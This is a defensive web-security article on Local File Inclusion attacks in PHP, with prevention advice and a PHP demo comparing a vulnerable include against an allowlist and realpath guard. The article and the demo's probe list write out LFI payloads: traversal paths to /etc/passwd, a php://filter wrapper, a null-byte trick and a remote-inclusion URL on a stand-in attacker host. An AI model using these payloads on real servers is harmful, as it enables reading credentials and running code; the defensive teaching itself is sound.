What Are Local File Inclusion (LFI) Attacks and Should You Be Worried?
January 16, 2023


If your site runs on PHP, you might be at risk of local file inclusion attacks. But how are they carried out and what can you do about them?

Web servers host the files that make up your web application (pages, images, videos, forms, scripts) and hand them out when someone visits your site. The application layered on top usually also decides how much each visitor may see, keeping regular users out of other people's accounts and out of administrative dashboards. Web servers are good at this job, and they do it fairly securely, but attackers can exploit human error or flawed logic in how an application decides which file to serve or include.

What Is an LFI Attack?

A Local File Inclusion (LFI) attack (sometimes mislabeled "Local File Intrusion") happens when an attacker makes a web application read, serve, or include a file from its own server that it was never meant to expose, by exploiting weak validation of a user-supplied file name or path. The vulnerability is most associated with PHP, where include() and require() are routinely fed a path built from a request parameter, but any application that opens files based on user input can have it.

Unlike attacks that rely on malware to corrupt an application, LFI needs little more than a browser and a modified request. No sophisticated tooling or complex scripts are required: the most common trick is to alter the value of a URL parameter that the application uses as a file path, substituting another file name, an absolute path such as /etc/passwd, or a directory-traversal sequence such as ../../.

How Do LFI Attacks Happen?

LFI attacks typically happen in four stages.

First, the attacker finds a website running a vulnerable application, usually by changing a parameter in the browser's URL bar to a probe value and watching whether the response changes. Think of it as pressing key combinations on a game controller to find an Easter egg, say pressing the down key on every pipe in Super Mario to see which one is a tunnel. The difference is that LFI probes are far more systematic than checking every pipe: attackers work through a short list of known payloads (traversal sequences, absolute paths, PHP stream wrappers such as php://filter) against every parameter that looks like it names a file.

An application or server that is misconfigured or fails to validate that input will act on it. If the parameter feeds a read or download routine, the attacker gets the contents of the named file; if it feeds PHP's include() or require(), the named file is executed as PHP code. From there the attacker may obtain the access they need to read sensitive files or, when they can get a file of their own onto the server, to run code on it.

Most LFI attacks end with the attacker reading sensitive information. Turning LFI into code execution is harder, because the attacker first needs attacker-controlled content (an uploaded file, say) on the same server where the vulnerable include runs, and there is no guarantee the application stores uploads there. In a multi-server environment, it often does not.

So if the LFI vulnerability exists on the server that hosts images but not the one that stores employee credentials or user passwords, the attacker can only reach files on the vulnerable image server. Even so, incidents such as the attack on LastPass show that hackers can wreak havoc starting from a seemingly insignificant level of access.

How to Prevent LFI Attacks

LFI attacks are quite common, according to the Open Web Application Security Project (OWASP). That is understandable: as W3Techs reports, nearly eight in ten websites run PHP as their server-side language, an abundance of potential victims, so to speak. LFI is preventable by following web security best practices.

Whitelist Public Server Files

Web applications often take a file path or file name as a URL parameter. Attackers abuse this by changing the part of the URL that doubles as a file path. For example, an attacker can change https://dummywebsite.com/?module=contact.php to https://dummywebsite.com/?module=/etc/passwd, or to https://dummywebsite.com/?module=../../../../etc/passwd when the application prepends a directory of its own. A server with poor filtering and flawed logic will then display the contents of /etc/passwd.

Of course, hackers use variations of common file names and combinations of encoded or traversal characters to increase the odds of success. The goal is to trick the web application into running a script or displaying a file it should never expose.

You can close this hole by creating a whitelist (allowlist) of the documents the application is permitted to serve and having it refuse every other file name or path. If an attacker manipulates the URL to request a private file or run a script outside that list, they get an error page instead of the file.

Test for Vulnerabilities Frequently

You can use web scanning tools to find and fix vulnerabilities that could expose you to LFI attacks. Web application scanners are automated tools that crawl your app the way an attacker would and report potential vulnerabilities. Open-source options exist, such as OWASP ZAP for web applications and OpenVAS for general vulnerability scanning, but many scanners are proprietary and require a paid plan.

Of course, you're not getting a scanner just for LFI. These tools also look for broader weaknesses such as remote file inclusion, cross-site scripting, SQL injection, and poor server configuration, so they are worth the investment.

Restrict Site Visitor Privileges

LFI attacks often succeed because web applications fail to compartmentalize privileges, allowing visitors to reach files that should be visible only to admins. This measure works like whitelisting: configure the application and server so that they serve public files only and reject unauthorized requests, especially requests for paths that contain sensitive files.

To that end, never let a request modify a file path directly. The application should serve documents only from a hardcoded list of paths, with the request supplying a short key (a module name, say) that is validated against a strict pattern of alphanumeric characters and then looked up in that list, rather than being concatenated into a path. Do not accept encoded forms of a name, such as base64 or bin2hex output, which attackers use to slip traversal sequences past naive filters.

If you're thinking of blacklisting file names, don't. Attackers keep a growing list of file names and encodings to try, and it is practically impossible (and a colossal waste of time) to maintain a blocklist against a constantly expanding set of payloads.
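The following PHP script is an added example, not code from the original article or from MakeUseOf. It ties together the ?module= scenario from "Whitelist Public Server Files" and the hardcoded-path-list advice in "Restrict Site Visitor Privileges": a vulnerable handler that uses the parameter as the include path, an allowlist replacement keyed on a strictly validated module name, and a realpath() guard for files that must be served by name from a public directory. The module names, the pages/ and public/ directory layout, and the probe strings are assumptions constructed for the demo, and the temporary files it creates are removed at the end. It needs PHP 8 for str_contains() and str_starts_with().

```php
<?php
// Added example, not code from the original article or from MakeUseOf.
// Module names, directory layout and probe strings are assumptions made
// up for this demo. Requires PHP 8 (str_contains, str_starts_with).

// VULNERABLE: the request parameter is used as the include path unchanged.
// Returning the path instead of calling include() shows the outcome safely.
function vulnerable_include_path(string $module): string
{
    return $module;   // include($module) would open /etc/passwd, php://filter/...
}

// HARDENED: a fixed map from short module keys to hardcoded paths (assumed layout).
const MODULES = [
    'contact' => __DIR__ . '/pages/contact.php',
    'about'   => __DIR__ . '/pages/about.php',
];

function resolve_module(string $module): ?string
{
    // Strict pattern first (\z rather than $ so a trailing newline cannot slip
    // through): '../', '://', NUL bytes and '%00' can never match, so traversal
    // and encoded names are rejected before any lookup happens.
    if (!preg_match('/^[a-z0-9_]{1,32}\z/', $module)) {
        return null;
    }
    return MODULES[$module] ?? null;   // unknown key -> null -> serve a 404
}

// Defence in depth for files that must be served by name (images, downloads):
// canonicalise with realpath() and require the result to stay under $baseDir.
function safe_public_file(string $baseDir, string $name): ?string
{
    if (str_contains($name, "\0")) {
        return null;                   // PHP 8 path functions throw on NUL bytes
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $name);
    if ($base === false || $real === false) {
        return null;                   // directory not deployed or file missing
    }
    // realpath() resolves '..' and symlinks; the prefix check then guarantees
    // the file lies inside $baseDir no matter how the name was written.
    return str_starts_with($real, $base . DIRECTORY_SEPARATOR) ? $real : null;
}

// Constructed probes of the kind sent in the first stage of an LFI attack.
$probes = [
    'contact',
    'contact.php',
    '../../../../etc/passwd',
    '....//....//etc/passwd',
    "contact\0.jpg",
    'php://filter/convert.base64-encode/resource=index.php',
    'http://attacker.example/shell.txt',
];
echo "== ?module= handling ==\n";
foreach ($probes as $p) {
    $shown = str_replace("\0", '%00', $p);
    $r = resolve_module($p);
    echo $shown, "\n";
    echo "    vulnerable: include(", str_replace("\0", '%00', vulnerable_include_path($p)), ")\n";
    echo "    hardened:   ", $r === null ? 'rejected (404)' : 'include(' . basename($r) . ')', "\n";
}

// Throwaway directory tree for the realpath guard: public/logo.png is meant
// to be served, the sibling secret.txt is not.
$tmp = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($tmp . '/public', 0700, true);
file_put_contents($tmp . '/public/logo.png', 'png-bytes');
file_put_contents($tmp . '/secret.txt', 'not for visitors');

echo "\n== files served by name from public/ ==\n";
foreach (['logo.png', '../secret.txt', '..%2Fsecret.txt', "logo.png\0.txt"] as $n) {
    $r = safe_public_file($tmp . '/public', $n);
    printf("%-20s -> %s\n", str_replace("\0", '%00', $n),
        $r === null ? 'rejected (404)' : 'serve ' . basename($r));
}

// Remove the demo files.
unlink($tmp . '/public/logo.png');
unlink($tmp . '/secret.txt');
rmdir($tmp . '/public');
rmdir($tmp);
```

Run it with `php lfi_demo.php`: only the bare key `contact` survives resolve_module(), while the traversal, null-byte, php://filter and remote-URL probes are all rejected before the filesystem is touched. In the second part, `../secret.txt` resolves to a real file but fails the prefix check, which is the case a pattern-only filter misses when the name arrives in an encoding the filter did not anticipate.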

Use a Multi-Server Environment

A multi-server environment lets you isolate sensitive documents from public files, which limits what a breach can reach. A dedicated server for public content is a poorer target for LFI because the sensitive files are simply not on it: even a successful inclusion only exposes what the compromised host can read.

Beyond that, splitting load across several servers also improves reliability (lower risk of downtime), speed, and efficiency. Admittedly, a multi-server setup is not cost-effective for a small site. In that case, at least split your application's data between a database for private data and a file server or directory for public files, so that a vulnerable file-serving path cannot read credentials and user records.

Should You Be Worried About LFI Attacks?

The possibility of an LFI attack is real, especially if your site runs on PHP, but you can reduce your exposure by configuring applications and servers according to web security best practices.

Furthermore, run routine security checks to find vulnerabilities. Things break all the time, especially as site architecture grows complex. The tools you need are automated, and many require neither an elaborate setup nor advanced technical know-how.

Reference: https://www.makeuseof.com/what-are-local-file-intrusion-attacks/
